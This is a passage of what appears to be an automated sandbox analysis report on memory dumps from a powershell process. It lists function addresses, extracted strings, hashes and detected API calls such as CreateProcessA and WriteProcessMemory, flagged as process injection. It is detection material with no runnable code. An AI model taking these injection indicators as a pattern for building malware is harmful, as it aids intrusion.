Instruction ID: fe5590452e4c0f821b37995813afd94136b0e940dd9ccbea64d760945913f41e
Opcode Fuzzy Hash: 3f3712634d04c908128d639af9bb941d8187a5fa11d2c3924181486aebe12ba6
Instruction Fuzzy Hash: 4511F9B1D002098FDB14DFAAC5446EFFBF8EF48324F14842AD519A7250CB78A944CFA1

Function 072BF5B0 Relevance: 1.6, Strings: 1, Instructions: 303COMMON

Download Yara Rule

Strings

PHjq, xrefs: 072BF946

Memory Dump Source

Source File: 00000004.00000002.2945519784.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID: PHjq
API String ID: 0-751881793
Opcode ID: aa22a6b50678da937d549d5d81c082342b52901071cdb1b25fb14cf8d8180000
Instruction ID: 1b8ff74d41e019e89c9d807535e826fd4688a07b6d0fe9dd5f90827cff146217
Opcode Fuzzy Hash: aa22a6b50678da937d549d5d81c082342b52901071cdb1b25fb14cf8d8180000
Instruction Fuzzy Hash: 96D138B4E25219CFEB24CFA9DA84BDDBBF2FB4A300F1080A9D409A7255D7745A85CF41

Function 0740FA18 Relevance: 1.5, Strings: 1, Instructions: 240COMMON

Download Yara Rule

Strings

Tejq, xrefs: 0740FAE8

Memory Dump Source

Source File: 00000004.00000002.2946066291.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7400000_powershell.jbxd

Similarity

API ID:
String ID: Tejq
API String ID: 0-2468842661
Opcode ID: 2df540ed517c4103c2412ddeb47f3d391cb6471624f580a2c90327452e83e3c3
Instruction ID: ea400c6c5d7e3123be6997425ca9425356211c3f64be140b923e5b2939a3d961
Opcode Fuzzy Hash: 2df540ed517c4103c2412ddeb47f3d391cb6471624f580a2c90327452e83e3c3
Instruction Fuzzy Hash: 11A1C2B0E14218CFDB24CFA9D984BEDBBF2BB49304F10947AD419A7295DB70994ACF40

Function 0740FA08 Relevance: 1.5, Strings: 1, Instructions: 239COMMON

Download Yara Rule

Strings

Tejq, xrefs: 0740FAE8

Memory Dump Source

Source File: 00000004.00000002.2946066291.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7400000_powershell.jbxd

Similarity

API ID:
String ID: Tejq
API String ID: 0-2468842661
Opcode ID: 831040957c915b923fca9a12c048950da7bf0c326045ebd24b3e608e38e5c956
Instruction ID: 4f9fa4612dd09f30ea72f1f32ff7303e4b90368c10b75dbc57dfce02afab37e5
Opcode Fuzzy Hash: 831040957c915b923fca9a12c048950da7bf0c326045ebd24b3e608e38e5c956
Instruction Fuzzy Hash: D2A1B2B0E14218CFDB24CFA9D984BDDBBF2BF49304F10946AD419A7295D7709986CF40

Function 074019A3 Relevance: .5, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2946066291.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7400000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a5a958f79638af482b4ae9d550f2847f5510e3041e014d1056175e7a3a58ef3
Instruction ID: be25337fe58ca7e70894fbfce4ae1e9ec883483fb3f68f4bb7ee3af9a22cd47a
Opcode Fuzzy Hash: 9a5a958f79638af482b4ae9d550f2847f5510e3041e014d1056175e7a3a58ef3
Instruction Fuzzy Hash: AE5291B4A012288FDB64DF28D988B9AB7B6BF49305F1081D9D90DA7355DB30AEC1CF51

Function 0740F1C3 Relevance: .3, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2946066291.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7400000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ba4310b92ffe61c29649b3a038e2d33a965532f8d88c4b1f1625242233f265a
Instruction ID: bbf8a1fa30a9cf6572d5c739b9ecd3b0188cf7c1372fa853cfaa8a3e17b35105
Opcode Fuzzy Hash: 5ba4310b92ffe61c29649b3a038e2d33a965532f8d88c4b1f1625242233f265a
Instruction Fuzzy Hash: CAE1E2B0E05219CFEB24CF69D984BDDBBF2BB4A304F1085BAD508A7295D7749985CF80

Function 07AF8780 Relevance: 46.6, Strings: 36, Instructions: 1588COMMON

Download Yara Rule

Strings

4'jq, xrefs: 07AF8F38
$jq, xrefs: 07AF9693
$jq, xrefs: 07AF8B7B
$jq, xrefs: 07AF92A0
$jq, xrefs: 07AF8B8B
$jq, xrefs: 07AF8DAC
$jq, xrefs: 07AF96A1
4'jq, xrefs: 07AF895B
$jq, xrefs: 07AF9269
$jq, xrefs: 07AF8B16
$jq, xrefs: 07AF8D8A
$jq, xrefs: 07AF8ACE
4'jq, xrefs: 07AF8967
$jq, xrefs: 07AF9431
$jq, xrefs: 07AF8D4D
4'jq, xrefs: 07AF8BB6
tPjq, xrefs: 07AF8E4A
$jq, xrefs: 07AF87B3
$jq, xrefs: 07AF87C1
tPjq, xrefs: 07AF90D7
$jq, xrefs: 07AF8B26
$jq, xrefs: 07AF9672
4'jq, xrefs: 07AF8F44
$jq, xrefs: 07AF9054
$jq, xrefs: 07AF8F18
4'jq, xrefs: 07AF8BAA
$jq, xrefs: 07AF8792
$jq, xrefs: 07AF9402
$jq, xrefs: 07AF8DBA
$jq, xrefs: 07AF8AEF
$jq, xrefs: 07AF9423
$jq, xrefs: 07AF8D6E
tPjq, xrefs: 07AF8E56
tPjq, xrefs: 07AF90E3
$jq, xrefs: 07AF9290
$jq, xrefs: 07AF8F08

Memory Dump Source

Source File: 00000004.00000002.2949177848.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7af0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$tPjq$tPjq$tPjq$tPjq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
API String ID: 0-1466735820
Opcode ID: 0eae18fea6022495f02ac0921aa92fc67008176d83b87dd6749704bd803bac59
Instruction ID: 8797272307bd27435d21401d3f0bb1d1afe8a904fbfa810cf99a69147fa5e50a
Opcode Fuzzy Hash: 0eae18fea6022495f02ac0921aa92fc67008176d83b87dd6749704bd803bac59
Instruction Fuzzy Hash: C9B23AB1704206CFDB258FA9D8407ABBBB6EFC6210F14846AFA25CB291DB35DC41C791

Function 07AFAC70 Relevance: 21.4, Strings: 16, Instructions: 1373COMMON

Download Yara Rule

Strings

$jq, xrefs: 07AFB7B7
$jq, xrefs: 07AFB7C3
4'jq, xrefs: 07AFB995
$jq, xrefs: 07AFBB39
4'jq, xrefs: 07AFB17E
4'jq, xrefs: 07AFB61B
4'jq, xrefs: 07AFB627
$jq, xrefs: 07AFBAF3
4'jq, xrefs: 07AFB7E6
4'jq, xrefs: 07AFBB61
4'jq, xrefs: 07AFBB55
4'jq, xrefs: 07AFB172
4'jq, xrefs: 07AFB7DA
4'jq, xrefs: 07AFB9A1
$jq, xrefs: 07AFB79B
$jq, xrefs: 07AFBB2D

Memory Dump Source

Source File: 00000004.00000002.2949177848.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7af0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$$jq$$jq$$jq$$jq$$jq$$jq
API String ID: 0-3369422823
Opcode ID: 792dadfb87cba101011a347b8a5ab7e85422519903a46fc810705192ce6c7bbc
Instruction ID: 2d5324831e1a2c888aa44041ef3c9ec6ecb4361c76e7369d15c91e7b454afb22
Opcode Fuzzy Hash: 792dadfb87cba101011a347b8a5ab7e85422519903a46fc810705192ce6c7bbc
Instruction Fuzzy Hash: 65A2C5F4B01205CFCB25DBA9C55066ABBB6EFC5311F24C06AEA258B355DB31DC42CBA1

Function 07AF1338 Relevance: 14.2, Strings: 11, Instructions: 401
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'jq, xrefs: 07AF13FB
tPjq, xrefs: 07AF1654
$jq, xrefs: 07AF160B
4'jq, xrefs: 07AF170B
$jq, xrefs: 07AF1699
$jq, xrefs: 07AF1584
4'jq, xrefs: 07AF1717
tPjq, xrefs: 07AF1648
$jq, xrefs: 07AF15B7
$jq, xrefs: 07AF15A9
4'jq, xrefs: 07AF1407

Memory Dump Source

Source File: 00000004.00000002.2949177848.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7af0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$4'jq$4'jq$tPjq$tPjq$$jq$$jq$$jq$$jq$$jq
API String ID: 0-2119639246
Opcode ID: 4346e860f6b7c4614d89f53e0188b99ae54fd9a65fb2adbd512689aaafba6b1e
Instruction ID: a434b51864300090ec33de74aab7a01cf637e6c7b74dad18ce4a6877278528dd
Opcode Fuzzy Hash: 4346e860f6b7c4614d89f53e0188b99ae54fd9a65fb2adbd512689aaafba6b1e
Instruction Fuzzy Hash: A0D12AF170031DDFCB158BA8D4106AABBF6EFC5211F14846AFA258B291DA35CD41CBA2

Function 07AF1988 Relevance: 12.9, Strings: 10, Instructions: 430
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$jq, xrefs: 07AF1B06
$jq, xrefs: 07AF1A89
4'jq, xrefs: 07AF1E73
4'jq, xrefs: 07AF1B98
$jq, xrefs: 07AF1A67
$jq, xrefs: 07AF1A97
$jq, xrefs: 07AF1AFA
4'jq, xrefs: 07AF1E7F
4'jq, xrefs: 07AF1B8C
$jq, xrefs: 07AF1A4B

Memory Dump Source

Source File: 00000004.00000002.2949177848.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7af0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$4'jq$4'jq$$jq$$jq$$jq$$jq$$jq$$jq
API String ID: 0-2815571254
Opcode ID: 5cb3f42f656df5e23f98e10c5b998ea3fca27518a61382339645f7b87ade78a2
Instruction ID: 07baa8e46bea555337fa9d0e724d81b0d89953a337b788a12d9c84de48209c10
Opcode Fuzzy Hash: 5cb3f42f656df5e23f98e10c5b998ea3fca27518a61382339645f7b87ade78a2
Instruction Fuzzy Hash: 3DF1C2B4B11209CFDB14CFA4C550BAABBB2EFC5314F14846AEA219B395DB36DC41CB91

Function 04BE419D Relevance: 6.7, Strings: 5, Instructions: 488
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'jq, xrefs: 04BE4559
4'jq, xrefs: 04BE45DE
Pqjq, xrefs: 04BE41D7
4'jq, xrefs: 04BE45EA
4'jq, xrefs: 04BE4565

Memory Dump Source

Source File: 00000004.00000002.2907999635.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4be0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$4'jq$4'jq$Pqjq
API String ID: 0-3790275363
Opcode ID: db076968002b1b59d831c1b3e63e387b08950950ae3f15d845363d9d9b66879e
Instruction ID: a0225f51237911c3ed9758a99cea68c7a04a78cd39b71baa824af5221ed7b74b
Opcode Fuzzy Hash: db076968002b1b59d831c1b3e63e387b08950950ae3f15d845363d9d9b66879e
Instruction Fuzzy Hash: E1226D74A40214CFDB24DB18C950B6ABBB6EBC4304F54C4E9D909AB356CB76ED82CF91

Function 07AF1969 Relevance: 6.4, Strings: 5, Instructions: 144
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$jq, xrefs: 07AF1A89
$jq, xrefs: 07AF1A67
$jq, xrefs: 07AF1AFA
4'jq, xrefs: 07AF1B8C
$jq, xrefs: 07AF1A4B

Memory Dump Source

Source File: 00000004.00000002.2949177848.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7af0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$$jq$$jq$$jq$$jq
API String ID: 0-651010669
Opcode ID: d1bccb42f703fe1f37cbf4fa5bf526e59b8b968a75e31d6491080f9c3ffa9792
Instruction ID: 46d994901a618be89d057897a64553d8bc64ce2deb342121aa7988ddfc2ffedd
Opcode Fuzzy Hash: d1bccb42f703fe1f37cbf4fa5bf526e59b8b968a75e31d6491080f9c3ffa9792
Instruction Fuzzy Hash: FC4115F061534EDFDB259FE0C9407B637B2AF82281F14406AFA21DB191EB35C981C7A1

Function 04BEF3BC Relevance: 6.0, Strings: 4, Instructions: 985COMMON

Download Yara Rule

Strings

(ojq, xrefs: 04BEF491
0l5r, xrefs: 04BEF993
(ojq, xrefs: 04BEF481
8'|, xrefs: 04BEF87E

Memory Dump Source

Source File: 00000004.00000002.2907999635.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4be0000_powershell.jbxd

Similarity

API ID:
String ID: (ojq$(ojq$0l5r$8'|
API String ID: 0-4237006631
Opcode ID: 70248732dfdebe6311c3d8ab97ebe74920e6d56a738c46bd735a636baf0fc9ef
Instruction ID: 1273b5556e8150251e3b6adb7c19d4daf62a4b7ea280ef16f8b6b398924a6466
Opcode Fuzzy Hash: 70248732dfdebe6311c3d8ab97ebe74920e6d56a738c46bd735a636baf0fc9ef
Instruction Fuzzy Hash: FF72F670909384BFD7268B79CC59BBA3F74EF82305F1981DAE2409B2E2C775A845C761

Function 07AFBFBD Relevance: 5.2, Strings: 4, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'jq, xrefs: 07AFC192
tPjq, xrefs: 07AFC0E9
4'jq, xrefs: 07AFC19E
tPjq, xrefs: 07AFC0DD

Memory Dump Source

Source File: 00000004.00000002.2949177848.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7af0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$tPjq$tPjq
API String ID: 0-1557731583
Opcode ID: c1697021e206349551c080bff8e93cf746b563fdbd48c8a58c0b092b9b33a02e
Instruction ID: ae9c1af8db608b724e6cc1d7f977047f2936be1b03dfff0e436a0f4905828cf7
Opcode Fuzzy Hash: c1697021e206349551c080bff8e93cf746b563fdbd48c8a58c0b092b9b33a02e
Instruction Fuzzy Hash: C5613BB174020D9FCB149BE9C85076ABBA6EFC9320F14C45AEA229F290DB35CD01CB71

Function 04BEBB4F Relevance: 3.7, Strings: 2, Instructions: 1230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'jq, xrefs: 04BEB88E
4'jq, xrefs: 04BEB921

Memory Dump Source

Source File: 00000004.00000002.2907999635.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4be0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq
API String ID: 0-1204115232
Opcode ID: ef38a47b50308e61faef2f0470780c7eca4d1ff3978dd2d291a169e2b6fb82df
Instruction ID: 5399c3a7dacf96e94bb45221cb75060a934a45362b6bdaf019e84f14011979c3
Opcode Fuzzy Hash: ef38a47b50308e61faef2f0470780c7eca4d1ff3978dd2d291a169e2b6fb82df
Instruction Fuzzy Hash: F1C253B4A00214DFDB54DB54C990BAABBB2EB85304F54C1E9DA096F351CB71EE82CF91

Function 04BE7D88 Relevance: 3.4, Strings: 2, Instructions: 923COMMON

Download Yara Rule

Strings

tPjq, xrefs: 04BE7F46
tPjq, xrefs: 04BE7F52

Memory Dump Source

Source File: 00000004.00000002.2907999635.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4be0000_powershell.jbxd

Similarity

API ID:
String ID: tPjq$tPjq
API String ID: 0-4117293638
Opcode ID: f38d03ee1315e0c5407a852787c829b32536206c6eb0530ffaa856ba229ead7b
Instruction ID: 1b94f4fd72b680e9af5bf860bbab5782fbd5af685b228581790fbf8944a75fa7
Opcode Fuzzy Hash: f38d03ee1315e0c5407a852787c829b32536206c6eb0530ffaa856ba229ead7b
Instruction Fuzzy Hash: 7A62F631700605DFCB14EF6AC954A7ABBE6EFC4310F58C4A9D9059B291DB32ED41CBA1

Function 04BE15D0 Relevance: 3.3, Strings: 2, Instructions: 769COMMON

Download Yara Rule

Strings

4'jq, xrefs: 04BE16E4
4'jq, xrefs: 04BE16F0

Memory Dump Source

Source File: 00000004.00000002.2907999635.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4be0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq
API String ID: 0-1204115232
Opcode ID: 538a9f76d11bdd6024cae6cd5bcba9a3392bd92bdfbf4f7d5e4a4cdcbb8e1d66
Instruction ID: d0dd2629afacc002c68e8cb3eedc4041a2ebcf58acd5015d4aff240a075bdd06
Opcode Fuzzy Hash: 538a9f76d11bdd6024cae6cd5bcba9a3392bd92bdfbf4f7d5e4a4cdcbb8e1d66
Instruction Fuzzy Hash: 32420375B002049FCB159F6EC4546BABBE6EFC5311F28C4EAD9058B251EB31EC86C7A1

Function 072C2050 Relevance: 2.9, Instructions: 2934COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2945618783.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_72c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4322ddb5f032a732b36ed85126987d50703d470169320d0a7750dc4998afc
Instruction ID: 4d02467c32050c4878f30be13a1b8d06a3ea0215c4d96e12fe3d92a31395fbd1
Opcode Fuzzy Hash: 01a4322ddb5f032a732b36ed85126987d50703d470169320d0a7750dc4998afc
Instruction Fuzzy Hash: 053371B0B10206DFD724CA58C950A6AFBF5FF99315B14C66DD8198B346DB32EC42CB92

Function 04BE16FC Relevance: 2.7, Strings: 2, Instructions: 172COMMON

Download Yara Rule

Strings

(ojq, xrefs: 04BE173F
(ojq, xrefs: 04BE174B

Memory Dump Source

Source File: 00000004.00000002.2907999635.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4be0000_powershell.jbxd

Similarity

API ID:
String ID: (ojq$(ojq
API String ID: 0-2467236674
Opcode ID: 74b4b18d2b9a96fc4e4de858c93bfd799141d4ef3066c6f01d66ce320cc446af
Instruction ID: e45f310708081448fd971563cca2666f408e0b9d45d348ec5280769947dcd959
Opcode Fuzzy Hash: 74b4b18d2b9a96fc4e4de858c93bfd799141d4ef3066c6f01d66ce320cc446af
Instruction Fuzzy Hash: 8851DD74B00204DFDB24CE5DC544AB9BBA2EFC4310F6881E6D9159F291DB31EC82CBA1

Function 0898DDA0 Relevance: 2.7, Strings: 2, Instructions: 156
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hnq, xrefs: 0898DF35
(nq, xrefs: 0898DEA6

Memory Dump Source

Source File: 00000004.00000002.2953289967.0000000008980000.00000040.00000800.00020000.00000000.sdmp, Offset: 08980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8980000_powershell.jbxd

Similarity

API ID:
String ID: (nq$Hnq
API String ID: 0-3116299003
Opcode ID: 2feaa54520c854b67f977db127a90c4f2fc77c66e8fd866b5e203df16d6a152c
Instruction ID: f262dafe803e4aaa3020765f445c88c6ba803985f5443fbd4924cd8ec26fb2bf
Opcode Fuzzy Hash: 2feaa54520c854b67f977db127a90c4f2fc77c66e8fd866b5e203df16d6a152c
Instruction Fuzzy Hash: 1D519B307006018FDB68AF28D4585AE7BA7FF99305B10486CD906CB7A4DE36EC06CB91

Function 04BEF08B Relevance: 2.6, Strings: 2, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'jq, xrefs: 04BEF121
4'jq, xrefs: 04BEF12D

Memory Dump Source

Source File: 00000004.00000002.2907999635.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4be0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq
API String ID: 0-1204115232
Opcode ID: 74492c203b616cd1c5976b10f7dd2e325ea3178411ee46565401d5e09473f045
Instruction ID: 0cb798290e21b8a41919665ffae42ee6e221f18df953c8068814728966a21962
Opcode Fuzzy Hash: 74492c203b616cd1c5976b10f7dd2e325ea3178411ee46565401d5e09473f045
Instruction Fuzzy Hash: D3314C31704208EFDF149E76C85027ABB96EFC5310F2484EAC546CB295EB36E852C792

Function 07AF8763 Relevance: 2.6, Strings: 2, Instructions: 71COMMON

Download Yara Rule

Strings

$jq, xrefs: 07AF8792
$jq, xrefs: 07AF87B3

Memory Dump Source

Source File: 00000004.00000002.2949177848.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7af0000_powershell.jbxd

Similarity

API ID:
String ID: $jq$$jq
API String ID: 0-3720491408
Opcode ID: c980ed79af925a1732bfdf13b16ebc19f2b512fdf6dd9eca34b725badf8acd0c
Instruction ID: 62bb1a0f03ed09eb56c7cf4ab98ddb8c3ec91461bb8955d97aa665d493165d64
Opcode Fuzzy Hash: c980ed79af925a1732bfdf13b16ebc19f2b512fdf6dd9eca34b725badf8acd0c
Instruction Fuzzy Hash: 0611B9B56082469FD7158B95DC40B62FB76FBC2651F28805BF7248B652DB39D840CF90

Function 07AF1B14 Relevance: 2.5, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$jq, xrefs: 07AF1B35
4'jq, xrefs: 07AF1B8C

Memory Dump Source

Source File: 00000004.00000002.2949177848.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7af0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$$jq
API String ID: 0-3510213134
Opcode ID: 0594dbb32b8ab7fc3a12622dbf857755a547347e7d28b9daa0f38a1bc4af6262
Instruction ID: 94512ae9f60a936743e2bb5d37d93b932fe9f1e22c42098a811999f54a84215d
Opcode Fuzzy Hash: 0594dbb32b8ab7fc3a12622dbf857755a547347e7d28b9daa0f38a1bc4af6262
Instruction Fuzzy Hash: A9F0F4B0A4020ECFCF289F94C800A6E73B2FB94340F10056AFE215A190E7758D12C7A5

Function 07AFB22D Relevance: 1.7, Strings: 1, Instructions: 475COMMON

Download Yara Rule

Strings

4'jq, xrefs: 07AFB172

Memory Dump Source

Source File: 00000004.00000002.2949177848.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7af0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq
API String ID: 0-3676250632
Opcode ID: 643afa8645d3bf02809ba687d78212a741b0dfc89dd841c3647af5bbf87f1087
Instruction ID: 0947f2f78fdc78c147d7aeb50b1680f9940b95589c7f24f3b52b4f66994dcae6
Opcode Fuzzy Hash: 643afa8645d3bf02809ba687d78212a741b0dfc89dd841c3647af5bbf87f1087
Instruction Fuzzy Hash: 41126CF4A01205DFDB24CB99C584A69BBB2FF89304F64C159EA299B355C732EC42CB91

Function 07AFAC51 Relevance: 1.7, Strings: 1, Instructions: 464COMMON

Download Yara Rule

Strings

4'jq, xrefs: 07AFB172

Memory Dump Source

Source File: 00000004.00000002.2949177848.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7af0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq
API String ID: 0-3676250632
Opcode ID: ce38546148f83e654327a8b79814e834830785f9ae399014757bbcb8b14237d3
Instruction ID: 50f6f4a78664554549117abc9d3a5f7e821dec453347d12a9eee44575c326f3c
Opcode Fuzzy Hash: ce38546148f83e654327a8b79814e834830785f9ae399014757bbcb8b14237d3
Instruction Fuzzy Hash: E2124FB8A01205DFDB24CF99C584A69B7B2FFC9304F24C159EA299B755C732EC42CB91

Function 073F6F44 Relevance: 1.7, APIs: 1, Instructions: 206
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 073F712A

Memory Dump Source

Source File: 00000004.00000002.2946000066.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73f0000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 17eccee33e1aee8cd64d3deadeb633a931ba8d248df24f621470cc3b27cedd65
Instruction ID: f82ce4bd707269467eb31ccb51d8cd0a1267d3296eb4438da2c974c6ebb8d08c
Opcode Fuzzy Hash: 17eccee33e1aee8cd64d3deadeb633a931ba8d248df24f621470cc3b27cedd65
Instruction Fuzzy Hash: 868137B1D0061A9FEB10CFA9C9817EEBBF1BF48350F148529E959E7284DB749885CF81

Function 073F6F50 Relevance: 1.7, APIs: 1, Instructions: 201
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 073F712A

Memory Dump Source

Source File: 00000004.00000002.2946000066.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73f0000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: aa5444a38ea89ca3a9c0416a922ce6867f4146d628bcb9b94c5d45c29035583f
Instruction ID: cf18f7a08ad9b10865a873c8c46455e0e5856d69530d29605aa0f160c1a2d0c5
Opcode Fuzzy Hash: aa5444a38ea89ca3a9c0416a922ce6867f4146d628bcb9b94c5d45c29035583f
Instruction Fuzzy Hash: 8C8126B1D0061A9FEB10CFA9C9817EEBBF1BF48350F148529E959A7284DB749885CF81

Function 073F83D2 Relevance: 1.6, APIs: 1, Instructions: 70
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 073F8468

Memory Dump Source

Source File: 00000004.00000002.2946000066.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73f0000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: dc811d8a7b97b36285a749e779b274d55ff3fb6ca89de7d280daf8151fadab96
Instruction ID: f9c6d4b081f1d6ef4c8e344b3277f04d175c653000472fb6c16a0da9657012f7
Opcode Fuzzy Hash: dc811d8a7b97b36285a749e779b274d55ff3fb6ca89de7d280daf8151fadab96
Instruction Fuzzy Hash: 5B2146B59003599FDB10DFA9C985BEEBBF1FF48320F10842AE919A7250C7789944CBA0

Function 073F83D8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 073F8468

Memory Dump Source

Source File: 00000004.00000002.2946000066.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73f0000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 8872f4169281c87104a04e562452407efbae48c19cc71d8b2b6f5757f00ac271
Instruction ID: 145888271d0d795d5be380a0f50dead6f557c5f141c83039c1ac709a9cf253a2
Opcode Fuzzy Hash: 8872f4169281c87104a04e562452407efbae48c19cc71d8b2b6f5757f00ac271
Instruction Fuzzy Hash: F72139B19003199FDB10DFAAC985BEEBBF5FF48310F508429E919A7240D7789944CBA0

Function 07279208 Relevance: 1.6, APIs: 1, Instructions: 66injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0727929D

Memory Dump Source

Source File: 00000004.00000002.2945228653.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7270000_powershell.jbxd

Similarity

